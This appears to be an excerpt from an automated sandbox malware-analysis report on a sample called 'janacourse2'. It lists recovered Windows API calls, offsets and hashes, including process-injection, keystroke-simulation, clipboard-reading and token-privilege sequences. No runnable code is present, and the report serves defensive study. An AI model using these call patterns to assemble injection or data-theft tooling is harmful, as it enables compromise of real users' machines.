  • Part of subcall function 00FB2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FB2DC4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Name$Path$FileFullLongOpen
• String ID: X
• API String ID: 779396738-3081909835
APIs
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FB3908
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: IconNotifyShell_
• String ID:
• API String ID: 1144537725-0
APIs
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00FB949C,?,00008000), ref: 00FB5773
• CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00FB949C,?,00008000), ref: 00FF4052
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• __Init_thread_footer.LIBCMT ref: 00FBBB4E
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Init_thread_footer
• String ID:
• API String ID: 1385522511-0
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 014DA443
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014DA4D9
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014DA4FB
Memory Dump Source
• Source File: 00000000.00000002.1653083565.00000000014D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 014D8000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_14d8000_janacourse2.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: LoadString
• String ID:
• API String ID: 2948472770-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
APIs
  • Part of subcall function 00FB4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FB4EDD,?,01081418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FB4E9C
  • Part of subcall function 00FB4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FB4EAE
  • Part of subcall function 00FB4E90: FreeLibrary.KERNEL32(00000000,?,?,00FB4EDD,?,01081418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FB4EC0
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,01081418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FB4EFD
  • Part of subcall function 00FB4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FF3CDE,?,01081418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FB4E62
  • Part of subcall function 00FB4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FB4E74
  • Part of subcall function 00FB4E59: FreeLibrary.KERNEL32(00000000,?,?,00FF3CDE,?,01081418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FB4E87
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Library$Load$AddressFreeProc
• String ID:
• API String ID: 2632591731-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
APIs
  • Part of subcall function 00FE4C7D: RtlAllocateHeap.NTDLL(00000008,00FB1129,00000000,?,00FE2E29,00000001,00000364,?,?,?,00FDF2DE,00FE3863,01081444,?,00FCFDF5,?), ref: 00FE4CBE
• _free.LIBCMT ref: 00FE506C
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: AllocateHeap_free
APIs
• RtlAllocateHeap.NTDLL(00000008,00FB1129,00000000,?,00FE2E29,00000001,00000364,?,?,?,00FDF2DE,00FE3863,01081444,?,00FCFDF5,?), ref: 00FE4CBE
Similarity
• API ID: AllocateHeap
APIs
• RtlAllocateHeap.NTDLL(00000000,?,01081444,?,00FCFDF5,?,?,00FBA976,00000010,01081440,00FB13FC,?,00FB13C6,?,00FB1129), ref: 00FE3852
Similarity
• API ID: AllocateHeap
APIs
• FreeLibrary.KERNEL32(?,?,01081418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FB4F6D
Similarity
• API ID: FreeLibrary
APIs
• WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,00FFEE51,01073630,00000002), ref: 0101CD26
  • Part of subcall function 0101CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0101CD19,?,?,?), ref: 0101CC59
  • Part of subcall function 0101CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0101CD19,?,?,?,?,00FFEE51,01073630,00000002), ref: 0101CC6E
  • Part of subcall function 0101CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0101CD19,?,?,?,?,00FFEE51,01073630,00000002), ref: 0101CC7A
Similarity
• API ID: File$Pointer$Write
APIs
• GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FB2DC4
  • Part of subcall function 00FB6B57: _wcslen.LIBCMT ref: 00FB6B6A
Similarity
• API ID: LongNamePath_wcslen
APIs
  • Part of subcall function 00FB3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FB3908
  • Part of subcall function 00FBD730: GetInputState.USER32 ref: 00FBD807
• SetCurrentDirectoryW.KERNEL32(?), ref: 00FB2B6B
  • Part of subcall function 00FB30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00FB314E
Similarity
• API ID: IconNotifyShell_$CurrentDirectoryInputState
APIs
• CreateFileW.KERNELBASE(00000000,00000000,?,00FF0704,?,?,00000000,?,00FF0704,00000000,0000000C), ref: 00FF03B7
Similarity
• API ID: CreateFile
                                                                                                            APIs
                                                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00FB1CBC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoParametersSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 3098949447-0
                                                                                                            • Opcode ID: 793c338a1396127c276ee940f99be6d58a528001c9b7890417b9dda3d2bd9aa3
                                                                                                            • Instruction ID: e3aa617f0a668cb88f703380e477c1dc95acb5cd09c013c59e36674bb0f8bdf7
                                                                                                            • Opcode Fuzzy Hash: 793c338a1396127c276ee940f99be6d58a528001c9b7890417b9dda3d2bd9aa3
                                                                                                            • Instruction Fuzzy Hash: 3AC04C352842049FF2244680B94AF587755A748B00F048001F6C9555C782B71450D750
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00FB949C,?,00008000), ref: 00FB5773
                                                                                                            • GetLastError.KERNEL32(00000002,00000000), ref: 010276DE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateErrorFileLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1214770103-0
                                                                                                            • Opcode ID: 83e12a5880d0c14c425199aaaee7a64bee2693442a44a0bf96343974691288f2
                                                                                                            • Instruction ID: 02a22e25750ba6762c3be4904441fa318f474ad262f77de7ff86f5f3d2cdd3cd
                                                                                                            • Opcode Fuzzy Hash: 83e12a5880d0c14c425199aaaee7a64bee2693442a44a0bf96343974691288f2
                                                                                                            • Instruction Fuzzy Hash: 1B81AF302043118FDB25EF29C891BAAB7E1BF98310F08455DF9865B292DB78E945DF92
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNELBASE(?,?,00000000,00FF24E0), ref: 00FB6266
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 52fd0cbd88fcebc596511dbbc47ec308e11a77b15345d1a35ef4efd006131e74
                                                                                                            • Instruction ID: a0bbada061c3d9dad58385cbf26bcdbd80f5e16c6ae84905b5a4fd3458e5cb8a
                                                                                                            • Opcode Fuzzy Hash: 52fd0cbd88fcebc596511dbbc47ec308e11a77b15345d1a35ef4efd006131e74
                                                                                                            • Instruction Fuzzy Hash: 54E09275900B01DFE7354F1AE904452FBE5FEE13613204A2ED4E592660D3B458869F50
                                                                                                            APIs
                                                                                                            • Sleep.KERNELBASE(000001F4), ref: 014DAC99
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1653083565.00000000014D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 014D8000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_14d8000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 3472027048-0
                                                                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                            • Instruction ID: c5ece3333d424a6e7fca30a9feccbfbba3294b135e94d11a861cb9e01cdde7d1
                                                                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                            • Instruction Fuzzy Hash: D2E0E67494410DDFDB00DFB4D6496AD7BB4EF04701F100161FD01D2280D6319D508A62
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FC9BB2
                                                                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0104961A
                                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0104965B
                                                                                                            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0104969F
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 010496C9
                                                                                                            • SendMessageW.USER32 ref: 010496F2
                                                                                                            • GetKeyState.USER32(00000011), ref: 0104978B
                                                                                                            • GetKeyState.USER32(00000009), ref: 01049798
                                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 010497AE
                                                                                                            • GetKeyState.USER32(00000010), ref: 010497B8
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 010497E9
                                                                                                            • SendMessageW.USER32 ref: 01049810
                                                                                                            • SendMessageW.USER32(?,00001030,?,01047E95), ref: 01049918
                                                                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0104992E
                                                                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 01049941
                                                                                                            • SetCapture.USER32(?), ref: 0104994A
                                                                                                            • ClientToScreen.USER32(?,?), ref: 010499AF
                                                                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 010499BC
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 010499D6
                                                                                                            • ReleaseCapture.USER32 ref: 010499E1
                                                                                                            • GetCursorPos.USER32(?), ref: 01049A19
                                                                                                            • ScreenToClient.USER32(?,?), ref: 01049A26
                                                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 01049A80
                                                                                                            • SendMessageW.USER32 ref: 01049AAE
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 01049AEB
                                                                                                            • SendMessageW.USER32 ref: 01049B1A
                                                                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 01049B3B
                                                                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 01049B4A
                                                                                                            • GetCursorPos.USER32(?), ref: 01049B68
                                                                                                            • ScreenToClient.USER32(?,?), ref: 01049B75
                                                                                                            • GetParent.USER32(?), ref: 01049B93
                                                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 01049BFA
                                                                                                            • SendMessageW.USER32 ref: 01049C2B
                                                                                                            • ClientToScreen.USER32(?,?), ref: 01049C84
                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 01049CB4
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 01049CDE
                                                                                                            • SendMessageW.USER32 ref: 01049D01
                                                                                                            • ClientToScreen.USER32(?,?), ref: 01049D4E
                                                                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 01049D82
                                                                                                              • Part of subcall function 00FC9944: GetWindowLongW.USER32(?,000000EB), ref: 00FC9952
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 01049E05
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                            • String ID: @GUI_DRAGID$F
                                                                                                            • API String ID: 3429851547-4164748364
                                                                                                            • Opcode ID: 4ab1b4107d27025f14378ed74766237ff186e1dd418e11c8b073439af98d43f1
                                                                                                            • Instruction ID: 52462a60ca60c2129865e3eb71b27db0d11e55dc59113314d1df29dd816dd05c
                                                                                                            • Opcode Fuzzy Hash: 4ab1b4107d27025f14378ed74766237ff186e1dd418e11c8b073439af98d43f1
                                                                                                            • Instruction Fuzzy Hash: F0428BB4208201AFE725CF28C985EABBBE5FF4C318F004669F6D9872A1D735A851CF51
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 010448F3
                                                                                                            • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 01044908
                                                                                                            • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 01044927
                                                                                                            • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0104494B
                                                                                                            • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0104495C
                                                                                                            • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0104497B
                                                                                                            • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 010449AE
                                                                                                            • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 010449D4
                                                                                                            • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 01044A0F
                                                                                                            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 01044A56
                                                                                                            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 01044A7E
                                                                                                            • IsMenu.USER32(?), ref: 01044A97
                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01044AF2
                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01044B20
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 01044B94
                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 01044BE3
                                                                                                            • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 01044C82
                                                                                                            • wsprintfW.USER32 ref: 01044CAE
                                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 01044CC9
                                                                                                            • GetWindowTextW.USER32(?,00000000,00000001), ref: 01044CF1
                                                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 01044D13
                                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 01044D33
                                                                                                            • GetWindowTextW.USER32(?,00000000,00000001), ref: 01044D5A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                                            • String ID: %d/%02d/%02d
APIs
• GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00FCF998
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0100F474
• IsIconic.USER32(00000000), ref: 0100F47D
• ShowWindow.USER32(00000000,00000009), ref: 0100F48A
• SetForegroundWindow.USER32(00000000), ref: 0100F494
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0100F4AA
• GetCurrentThreadId.KERNEL32 ref: 0100F4B1
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0100F4BD
• AttachThreadInput.USER32(?,00000000,00000001), ref: 0100F4CE
• AttachThreadInput.USER32(?,00000000,00000001), ref: 0100F4D6
• AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0100F4DE
• SetForegroundWindow.USER32(00000000), ref: 0100F4E1
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0100F4F6
• keybd_event.USER32(00000012,00000000), ref: 0100F501
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0100F50B
• keybd_event.USER32(00000012,00000000), ref: 0100F510
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0100F519
• keybd_event.USER32(00000012,00000000), ref: 0100F51E
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0100F528
• keybd_event.USER32(00000012,00000000), ref: 0100F52D
• SetForegroundWindow.USER32(00000000), ref: 0100F530
• AttachThreadInput.USER32(?,000000FF,00000000), ref: 0100F557
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
APIs
  • Part of subcall function 010116C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0101170D
  • Part of subcall function 010116C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0101173A
  • Part of subcall function 010116C3: GetLastError.KERNEL32 ref: 0101174A
• LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 01011286
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 010112A8
• CloseHandle.KERNEL32(?), ref: 010112B9
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 010112D1
• GetProcessWindowStation.USER32 ref: 010112EA
• SetProcessWindowStation.USER32(00000000), ref: 010112F4
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 01011310
  • Part of subcall function 010110BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,010111FC), ref: 010110D4
  • Part of subcall function 010110BF: CloseHandle.KERNEL32(?,?,010111FC), ref: 010110E9
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
• String ID: $default$winsta0
APIs
  • Part of subcall function 010110F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01011114
  • Part of subcall function 010110F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,01010B9B,?,?,?), ref: 01011120
  • Part of subcall function 010110F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,01010B9B,?,?,?), ref: 0101112F
  • Part of subcall function 010110F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,01010B9B,?,?,?), ref: 01011136
  • Part of subcall function 010110F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0101114D
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01010BCC
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 01010C00
• GetLengthSid.ADVAPI32(?), ref: 01010C17
• GetAce.ADVAPI32(?,00000000,?), ref: 01010C51
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 01010C6D
• GetLengthSid.ADVAPI32(?), ref: 01010C84
• GetProcessHeap.KERNEL32(00000008,00000008), ref: 01010C8C
• HeapAlloc.KERNEL32(00000000), ref: 01010C93
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 01010CB4
• CopySid.ADVAPI32(00000000), ref: 01010CBB
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01010CEA
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 01010D0C
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 01010D1E
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 01010D45
• HeapFree.KERNEL32(00000000), ref: 01010D4C
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 01010D55
• HeapFree.KERNEL32(00000000), ref: 01010D5C
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 01010D65
• HeapFree.KERNEL32(00000000), ref: 01010D6C
• GetProcessHeap.KERNEL32(00000000,?), ref: 01010D78
• HeapFree.KERNEL32(00000000), ref: 01010D7F
  • Part of subcall function 01011193: GetProcessHeap.KERNEL32(00000008,01010BB1,?,00000000,?,01010BB1,?), ref: 010111A1
  • Part of subcall function 01011193: HeapAlloc.KERNEL32(00000000,?,00000000,?,01010BB1,?), ref: 010111A8
  • Part of subcall function 01011193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,01010BB1,?), ref: 010111B7
Similarity
• API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
APIs
• OpenClipboard.USER32(0104CC08), ref: 0102EB29
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0102EB37
• GetClipboardData.USER32(0000000D), ref: 0102EB43
• CloseClipboard.USER32 ref: 0102EB4F
• GlobalLock.KERNEL32(00000000), ref: 0102EB87
• CloseClipboard.USER32 ref: 0102EB91
• GlobalUnlock.KERNEL32(00000000), ref: 0102EBBC
• IsClipboardFormatAvailable.USER32(00000001), ref: 0102EBC9
• GetClipboardData.USER32(00000001), ref: 0102EBD1
• GlobalLock.KERNEL32(00000000), ref: 0102EBE2
